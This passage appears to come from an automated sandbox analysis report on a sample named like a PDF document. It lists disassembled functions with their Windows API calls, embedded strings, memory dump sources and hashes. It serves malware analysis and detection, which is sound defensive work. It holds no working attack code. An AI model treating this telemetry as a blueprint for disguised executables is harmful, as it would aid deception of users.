                                    • SetWindowTextW.USER32(00000000,?), ref: 0100C518
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C528
                                    • SetWindowTextW.USER32(00000000,?), ref: 0100C52E
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0100C54F
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0100C569
                                    • GetWindowRect.USER32(?,?), ref: 0100C572
                                    • SetWindowTextW.USER32(?,?), ref: 0100C5DD
                                    • GetDesktopWindow.USER32 ref: 0100C5E3
                                    • GetWindowRect.USER32(00000000), ref: 0100C5EA
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0100C636
                                    • GetClientRect.USER32(?,?), ref: 0100C643
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0100C668
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0100C693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 8115812785f4812e74742cee5611d7c3720b92e031ea0698528c543f1ea1abdb
                                    • Instruction ID: cf4e72c7aec5880cf7425ca018b44aa07a7978b58ebfb616db9dee05f0919d34
                                    • Opcode Fuzzy Hash: 8115812785f4812e74742cee5611d7c3720b92e031ea0698528c543f1ea1abdb
                                    • Instruction Fuzzy Hash: C651617090070AAFEB219FA8DE85B6FBBF9FF04705F004658E682A25A0C775A944DB50
                                    Function 0103A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0103A4C8
                                    • DestroyWindow.USER32(?,?), ref: 0103A542
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0103A5BC
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0103A5DE
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103A5F1
                                    • DestroyWindow.USER32(00000000), ref: 0103A613
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 0103A64A
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103A663
                                    • GetDesktopWindow.USER32 ref: 0103A67C
                                    • GetWindowRect.USER32(00000000), ref: 0103A683
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0103A69B
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0103A6B3
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: e573173c0f8f7bf17ef8671d4a79fdf4f96f3f2ea4448288a1acaaf9ac5831e0
                                    • Instruction ID: b8869a17a84b1a9e796a0f536921736000b9262e72446d77f0de9f64a4529f2f
                                    • Opcode Fuzzy Hash: e573173c0f8f7bf17ef8671d4a79fdf4f96f3f2ea4448288a1acaaf9ac5831e0
                                    • Instruction Fuzzy Hash: 64717970640205AFE721DF28C849F6A7BE9FBC8300F04451DFAC6D72A1D776A906DB21
                                    Function 0103C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DragQueryPoint.SHELL32(?,?), ref: 0103C917
                                      • Part of subcall function 0103ADF1: ClientToScreen.USER32(?,?), ref: 0103AE1A
                                      • Part of subcall function 0103ADF1: GetWindowRect.USER32(?,?), ref: 0103AE90
                                      • Part of subcall function 0103ADF1: PtInRect.USER32(?,?,0103C304), ref: 0103AEA0
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0103C980
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0103C98B
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0103C9AE
                                    • _wcscat.LIBCMT ref: 0103C9DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0103C9F5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0103CA0E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0103CA25
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0103CA47
                                    • DragFinish.SHELL32(?), ref: 0103CA4E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0103CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 169749273-3440237614
                                    • Opcode ID: 62515059db602f99d9a36fa71c0248522aa88de660c07966a07c221791c9a80f
                                    • Instruction ID: 91e78eef232b860d5de37df6298f918dfeb686692bdae5010bb65de7ecacf608
                                    • Opcode Fuzzy Hash: 62515059db602f99d9a36fa71c0248522aa88de660c07966a07c221791c9a80f
                                    • Instruction Fuzzy Hash: CB618871508301AFD710EF61CC89D9BBBECEFC8750F000A1EF692A61A1DB759A09DB52
                                    Function 01034619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 010346AB
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010346F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: f119cb9a643af829eb026cfe0a9cbef64bb63abff67944ef82f6cadf3682832d
                                    • Instruction ID: d72ea74ff5d32a51a20a14ab84355c373f87af64469dd9ca29e8a09fe769ce2e
                                    • Opcode Fuzzy Hash: f119cb9a643af829eb026cfe0a9cbef64bb63abff67944ef82f6cadf3682832d
                                    • Instruction Fuzzy Hash: 079160742043029BCB14EF25C850AADBBEABF94314F04445DA9D69B3A2CB79ED4ADB41
                                    Function 0101A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CharLowerBuffW.USER32(?,?), ref: 0101A636
                                    • GetDriveTypeW.KERNEL32 ref: 0101A683
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A6CB
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A702
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A730
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: df0e9b5adca9ccf98fa1a57cd2b631e0d6f2db688c73e5865d0aafd161801320
                                    • Instruction ID: b457e837a13abfaca094a4dde0360180f28745e4945a01947ca62f07caacc1ef
                                    • Opcode Fuzzy Hash: df0e9b5adca9ccf98fa1a57cd2b631e0d6f2db688c73e5865d0aafd161801320
                                    • Instruction Fuzzy Hash: D45138712043059FC700EF25CC819AAB7E9FF88718F00495DF896A7261DB39AE0ADF52
                                    Function 0101A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0101A47A
                                    • __swprintf.LIBCMT ref: 0101A49C
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101A4D9
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0101A4FE
                                    • _memset.LIBCMT ref: 0101A51D
                                    • _wcsncpy.LIBCMT ref: 0101A559
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0101A58E
                                    • CloseHandle.KERNEL32(00000000), ref: 0101A599
                                    • RemoveDirectoryW.KERNEL32(?), ref: 0101A5A2
                                    • CloseHandle.KERNEL32(00000000), ref: 0101A5AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: d9687fe024cc975201c4613714dfca2b58d897f1585ce85d7e1ce1d3f741a319
                                    • Instruction ID: 3ac25c2cd4bcd68da8e6f0e85e9c5bebf38d0ed776097e7251598b6c49b58e9d
                                    • Opcode Fuzzy Hash: d9687fe024cc975201c4613714dfca2b58d897f1585ce85d7e1ce1d3f741a319
                                    • Instruction Fuzzy Hash: 3331D271A0014AABDB219FA4DC48FEB77BDEF88301F1041B6FA48D3154EB7892448B25
                                    Function 00FEAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                    • String ID:
                                    • API String ID: 884005220-0
                                    • Opcode ID: 6335cedb1ba8d9df5208ccad8311a5bbb1e6f94acf9160292652472418759e45
                                    • Instruction ID: 2cc83933b99537493739d8aabd9f24b100bb948a845c4f97703f9d6cd4bd96bf
                                    • Opcode Fuzzy Hash: 6335cedb1ba8d9df5208ccad8311a5bbb1e6f94acf9160292652472418759e45
                                    • Instruction Fuzzy Hash: 38610472E00245EFDB206F26EC02B6977AAEF51731F244166E801DB284DB3DE841E792
                                    Function 0101DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0101DC7B
                                    • _wcscat.LIBCMT ref: 0101DC93
                                    • _wcscat.LIBCMT ref: 0101DCA5
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0101DCBA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101DCCE
                                    • GetFileAttributesW.KERNEL32(?), ref: 0101DCE6
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0101DD00
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101DD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: 91cb853938ddffce48c90ed575d9e6e0ce462b1060859b892f9cd2e0437a8d8e
                                    • Instruction ID: 0ac6968a37192aa02b6bcf711b98cf92b9db776ed163cd1ac18f01f35f7f4593
                                    • Opcode Fuzzy Hash: 91cb853938ddffce48c90ed575d9e6e0ce462b1060859b892f9cd2e0437a8d8e
                                    • Instruction Fuzzy Hash: F181B471504245DFD764EFA8C8899AEB7E8BB88300F088C6EF5C6C7255E738E944CB52
                                    Function 0103C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0103C4EC
                                    • GetFocus.USER32 ref: 0103C4FC
                                    • GetDlgCtrlID.USER32(00000000), ref: 0103C507
                                    • _memset.LIBCMT ref: 0103C632
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0103C65D
                                    • GetMenuItemCount.USER32(?), ref: 0103C67D
                                    • GetMenuItemID.USER32(?,00000000), ref: 0103C690
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0103C6C4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0103C70C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0103C744
                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0103C779
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 1296962147-4108050209
                                    • Opcode ID: ea69deff5839922b5bb0beafe5ca4e875265fec925bb24426e1a0e04370d5901
                                    • Instruction ID: 4b09ea8cadd347c70f966040660f719fa82b4bf65925db308d9b6036d2e82ef2
                                    • Opcode Fuzzy Hash: ea69deff5839922b5bb0beafe5ca4e875265fec925bb24426e1a0e04370d5901
                                    • Instruction Fuzzy Hash: 8F816A706083019FE761DF28CA84AAABBE8FBC8354F00055EFAD5E3291D731D905DB92
                                    Function 010083F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                      • Part of subcall function 0100874A: GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                      • Part of subcall function 0100874A: GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                      • Part of subcall function 0100874A: HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                      • Part of subcall function 010087E7: GetProcessHeap.KERNEL32(00000008,01008240,00000000,00000000,?,01008240,?), ref: 010087F3
                                      • Part of subcall function 010087E7: HeapAlloc.KERNEL32(00000000,?,01008240,?), ref: 010087FA
                                      • Part of subcall function 010087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01008240,?), ref: 0100880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01008458
                                    • _memset.LIBCMT ref: 0100846D
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0100848C
                                    • GetLengthSid.ADVAPI32(?), ref: 0100849D
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 010084DA
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010084F6
                                    • GetLengthSid.ADVAPI32(?), ref: 01008513
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01008522
                                    • HeapAlloc.KERNEL32(00000000), ref: 01008529
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0100854A
                                    • CopySid.ADVAPI32(00000000), ref: 01008551
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01008582
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010085A8
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010085BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 3996160137-0
                                    • Opcode ID: fec9feb719b9fc856265f39d6953300b56a90f6b707aecda5f18d3ddae9a8d0d
                                    • Instruction ID: 676c4f6f9c680fd30359002e446440593dbc76e99bb403fcac0158fc1bd84311
                                    • Opcode Fuzzy Hash: fec9feb719b9fc856265f39d6953300b56a90f6b707aecda5f18d3ddae9a8d0d
                                    • Instruction Fuzzy Hash: 03614E71D0020AAFEF11DF98DC44AEEBBB9FF04201F04816AF955A7294DB369A15CF60
                                    Function 0102762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 010276A2
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 010276AE
                                    • CreateCompatibleDC.GDI32(?), ref: 010276BA
                                    • SelectObject.GDI32(00000000,?), ref: 010276C7
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0102771B
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01027757
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0102777B
                                    • SelectObject.GDI32(00000006,?), ref: 01027783
                                    • DeleteObject.GDI32(?), ref: 0102778C
                                    • DeleteDC.GDI32(00000006), ref: 01027793
                                    • ReleaseDC.USER32(00000000,?), ref: 0102779E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 92c189017b168c62010163154e421e9794dfba2ec95a25830c6de770fdad0730
                                    • Instruction ID: 85d77df2a335075525e90701f4537ef04b2c41ff75d4f9f07686c6ccbeed408a
                                    • Opcode Fuzzy Hash: 92c189017b168c62010163154e421e9794dfba2ec95a25830c6de770fdad0730
                                    • Instruction Fuzzy Hash: 4D514A75900319EFDB25CFA8D888EAEBBB9FF48710F14851DF99A97210D735A840CB60
                                    Function 0101A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,0103FB78), ref: 0101A0FC
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 0101A11E
                                    • __swprintf.LIBCMT ref: 0101A177
                                    • __swprintf.LIBCMT ref: 0101A190
                                    • _wprintf.LIBCMT ref: 0101A246
                                    • _wprintf.LIBCMT ref: 0101A264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 311963372-2391861430
                                    • Opcode ID: 6900104a3bced209779dfd23fc2c24d1ad8ca39915f525dd82b238b5412eb3b3
                                    • Instruction ID: 5d9eda30dc0e98870dfa9cf0d5dd870f61c578520a07ac82eb30e0303400ddab
                                    • Opcode Fuzzy Hash: 6900104a3bced209779dfd23fc2c24d1ad8ca39915f525dd82b238b5412eb3b3
                                    • Instruction Fuzzy Hash: 47516B7190060AAADF15FBA5CD82EEEB779AF04300F1001A5F54573191EB3A6F48EFA1
                                    Function 00FB6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FB6C6C,?,00008000), ref: 00FD0BB7
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FB6D0D
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB6E5A
                                      • Part of subcall function 00FB59CD: _wcscpy.LIBCMT ref: 00FB5A05
                                      • Part of subcall function 00FD387D: _iswctype.LIBCMT ref: 00FD3885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
